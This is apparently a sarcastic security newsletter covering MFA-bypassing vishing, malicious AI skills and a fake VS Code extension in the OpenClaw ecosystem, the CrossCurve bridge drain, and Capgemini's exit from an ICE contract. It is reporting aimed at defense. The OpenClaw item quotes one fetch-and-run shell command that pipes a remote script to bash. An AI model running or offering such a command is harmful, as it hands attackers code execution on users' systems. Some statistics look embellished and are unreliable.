Hackers weaponize MFA, AI skills, DeFi bridges; EU spurns surveillance

TL;DR

• Vishing Campaigns Compromise SSO-Protected SaaS Accounts via Credential Harvesting
• OpenClaw Ecosystem Targeted by 14 Malicious AI Skills on ClawHub
• CrossCurve Bridge Exploit Steals $3M via Smart Contract Vulnerability
• Capgemini to divest from ICE contract amid protests over surveillance program

🔐 ShinyHunters vish SSO, bypass MFA, exfil SaaS, extort billions

ShinyHunters vish 100+ firms, hijack Okta/Entra SSO, grab MFA tokens live, exfil M365 & Slack data, threaten $1B ransom. FIDO2 keys block the replay. Ready to retire push-only MFA?

Another Monday, another 200 “IT support” calls spoofing your own switchboard, and—surprise—ShinyHunters just turned your Okta dashboard into their personal Netflix. Vishing isn’t new; it’s just the cheapest ticket in town: one Twilio account, a $3 NICENIC domain, and your employee who still thinks “password123!” is clever. Total cost to attackers: less than your weekly latte budget. Total cost to you: up to a billion in extortion, GDPR lawyers on speed-dial, and a CISO tweet-storm that ages like milk.

MFA Push? Might as Well Send Smoke Signals

Real-time relay of that cute six-digit code guts every feel-good security bumper sticker you’ve slapped on slide decks. Push-only MFA is a snooze button for criminals; they ring, you push, they loot. Only FIDO2 hardware screams “NOPE”—but only 5 % of you bothered to plug one in. The other 95 % are busy recycling the same creds across Slack, Salesforce and your kid’s Minecraft login. Credential reuse: because remembering 200 passwords is hard, but explaining a breach to the board is harder.

One Phish, Two Phish, Red Team, Blue Team

Attack chain in a nutshell: spoofed caller ID, cloned login page, live relay, fresh device token, data hoovered before your SOC finishes its bagel. Delete local logs all you want—the persistence lives in that shiny new Entra device identity that survives password resets like a cockroach after nukes. By the time your alert fires, the hunters are already flipping your R&D folder on a dark-web auction, minimum bid: 50 BTC.

Budget Zero, Problems 100—What Actually Works?

• FIDO2 or GTFO. Security keys cost $20; breach headlines cost careers.
• Unique passwords. Password managers are free; explaining credential leaks to customers is not.
• Short-lived SSO cookies. Treat them like dairy—if it smells older than an hour, toss it.
• Out-of-band device registration approval. If HR can’t approve PTO without two clicks, don’t let new laptops enroll with zero.
• Sinkhole those NICENIC domains. Your DNS filter is cheaper than your cyber-insurance deductible.

Forecast: Same Crap, Pricier Toilet Paper

Next quarter, vishing volume jumps 40 %—why change tactics when the cattle still hand out MFA codes like candy? Mid-term, regulators finally wake up; expect NIST to wave the FIDO2 stick while insurers jack premiums 30 %. Long-term, AI voice-print analysis lands in SOC tools, attackers pivot to SIM-swap and OAuth token theft, and the whole circus starts over—because patching humans is still version 0.1 beta.

Until then, keep answering that “internal” call, keep pushing that green approve button, and keep wondering why your cloud bill suddenly includes a line item labeled “ransom.” The rest of us will be over here, laughing in hardware-backed silence.

🚨 OpenClaw,VS Code,ClawHub,14 Malicious AI Skills,Credential Theft,Supply-Chain Attack

OpenClaw hit by 14 malicious AI skills on ClawHub + fake VS Code extension; copy-paste shell cmd & ScreenConnect RAT hijack crypto traders. 100+ open ports, 4k+ downloads, zero code-signing. Ready for signed-skills-only marketplaces?

Copy-pasting a one-liner from a “crypto-trading genie” is the digital equivalent of licking a subway handrail—gross, predictable, and you’ll be leaking more than tears.

14 Skills, Zero Chill—How’d the Crap Get Crowned?

ClawHub’s “review” is a rubber-stamp carnival: no signature check, no sandbox, no static scan—just vibes. The obfuscated bash -c "$(curl -sL pwn.me)" slid through like a drunk CEO at an open bar. Front-page placement? Algorithmic luck plus zero friction equals 4 k wannabe Wolf-of-OpenClaw users volunteering their SSH keys.

VS Code Extension—Because One Backdoor Wasn’t Enough

Fake “OpenClaw Assistant” drops a Rust-bundled ScreenConnect client via DLL side-load; PowerShell and osasscript do the macOS two-step. Default port 18789 sits on ≥100 public IPs, 8 naked, 47 passworded with “1234.” Shodan’s basically the attacker’s recon wingman.

Enterprise EDRs—Blind to Agent Babble

Your slick endpoint tool logs process spawn but can’t read the semantic stink of an AI skill ordering itself root privileges. Translation: breach noise arrives as a polite “404” while the crown jewels Uber themselves to darkgptprivate[.]com.

Cheap-Fix Playbook (No Magic, Just Muscle)

1. Sign every skill or GTFO—PGP, minisign, whatever, just make forgery cost > $0.
2. Container straight-jacket: read-only FS, zero-net egress except to a user-defined allow-list.
3. Kill port 18789 or armor it with mTLS; default creds are a confession, not a config.
4. Revoke & rotate every key that ever sniffed an OpenClaw instance—assume compromise, save face.
5. Marketplace bot that auto-yanks extensions executing post-install scripts; should take Microsoft less time than another Teams emoji update.

Long Game—Regulation & Rep-Rinse

NIST’s AI framework is sharpening pencils; expect signed-bill mandates in <12 months. Until then, security gateways selling “AI-skill SVR” (static + dynamic) will monetize the fear—budget holders love a three-letter acronym to bless.

Bottom line: if your supply-chain gate is a clipboard and a prayer, don’t act shocked when 14 sketchy skills turn your cloud castle into a public urinal. 🔒

🚨 CrossCurve loses $3M, SafeHarbor bounty, DeFi bridge risk

CrossCurve PortalV2 drained $3M in 1 block—no auth checks on ReceiverAxelar+expressExecute. SafeHarbor offers 10% bounty for returns. Ready for bridge-grade RBAC & circuit-breakers?

Ever fantasize about emptying a vault by simply whispering “open sesame” at the door?
Welcome to CrossCurve’s PortalV2, where two little functions—ReceiverAxelar & expressExecute—did exactly that. No key, no signature, no problem. Just call, mint, ghost. Three million bucks gone faster than you can say “DeFi due-diligence.”

How Did a Public Function Become a Personal ATM?

• Access control? Nope.
• Origin check? Zero.
• Pause button? Not until block 24364392 was already drained.

Attackers spam-crafted cross-chain messages, tricking the contract into believing it had legitimate burn-and-mint orders. PortalV2 obeyed like a polite intern, releasing stablecoins & native tokens to 10 fresh wallets that instantly tornado-cashed the trail. Forty-plus bridge hacks in January alone prove this isn’t a bug; it’s a business model.

White-Hat Hail-Mary: 10 % Bounty for Moral Flex

SafeHarbor’s “rescue fund” promises up to 10 % back—think of it as tipping the bartender who returns your stolen beer. Best-case haul: ~$300 k. Cute, but the other 90 % is still lounging in mixer limbo, earning yield for the hoodie squad.

Cheap Fixes That Won’t Get You REKT

1. RBAC on every external handler—because strangers shouldn’t mint your money.
2. Time-locks + circuit-breakers—give humans a chance to pull the plug before the bot apocalypse.
3. Multi-sig DAO upgrades—single admin keys are just $5 wrench attacks waiting to happen.
4. Real-time anomaly alerts—if velocity > normal by 5×, freeze first, tweet later.

All open-source, all auditable, all cheaper than explaining to investors why your “decentralized” bridge moonlighted as a charity.

Bottom Line

Cross-chain bridges are the freeway overpasses of crypto: convenient, expensive to maintain, and catastrophically ugly when they collapse. Until teams weld on basic guardrails—authentication, governance, kill-switches—every new launch is a $3 M piñata for whoever bothers to read the Solidity.

Build safer, or keep donating to the hacker pension fund. Your call.

🛡️ Capgemini exits ICE deal, reallocates staff, shields EU brand

Capgemini pulls the plug on its $365M ICE surveillance contract after EU pressure & 450+ CEO protests—only 0.4% of revenue but 100% brand risk. Skip-trace tech sold, 2.4k French roles shifted to cloud/AI security. Ready for ESG-compliant gov-tech?

Because even a 0.4 % revenue pimple can turn into a full-body GDPR rash when 450 CEOs, two dead citizens, and the French economy minister tag-team your inbox.

What Exactly Is “Skip-Tracing” and Why Does It Cost More Than a Netflix Budget?

It’s big-data stalking: scrape DMV records, telco metadata, utility bills, social-graph crumbs, then feed the slurry to ICE agents so they can knock on doors at 4 a.m. Capgemini’s cloud cluster cross-linked 1.3 B rows in 42 ms—impressive, until the billable hours hit $365 M. That’s $0.28 per terrified human; cheaper than a latte, pricier than a conscience.

How Do You Dump a Toxic Asset Without Triggering a 10-K Heart Attack?

You spin out Capgemini Government Solutions—an LLC with 400 staff, $4.8 M base, and a brand that now smells like tear gas. Valuation? Slap a 12× EBITDA multiple on the non-ICE backlog, haircut 30 % for protest discount, and voilà: $60 M pocket change—barely a rounding error on a €100 B parent. Announce it on a Friday, bury it under 2,400 French layoffs, and the market yawns.

Will the EU Actually Ban You for Serving Uncle Sam’s Deportation API?

Not yet, but the GDPR artillery is locked and loaded. Cross-border dumps of biometric tags to Palantir’s ICE instance? That’s Article 44-49 felony bingo—4 % global revenue fines, aka €4 B buzz-cut. The CNIL’s draft memo already labels “immigration enforcement data” as high-risk; one Schrems-style lawsuit and Capgemini’s cloud contracts in Brussels evaporate faster than a student visa.

Who’s Left Holding the Surveillance Hot Potato?

Private-equity vultures circling CGS: think Cerberus-plus-GEO-Group sausage roll. They’ll strip the ESG slides, rebrand as “Homeland Data Analytics,” and keep shipping CSVs to ICE while the French parent polishes its AI-for-good PowerPoint. Meanwhile, 2,400 soon-to-be-ex-employees learn Kubernetes for pink slips. Capitalism’s version of witness protection—change the logo, keep the cash.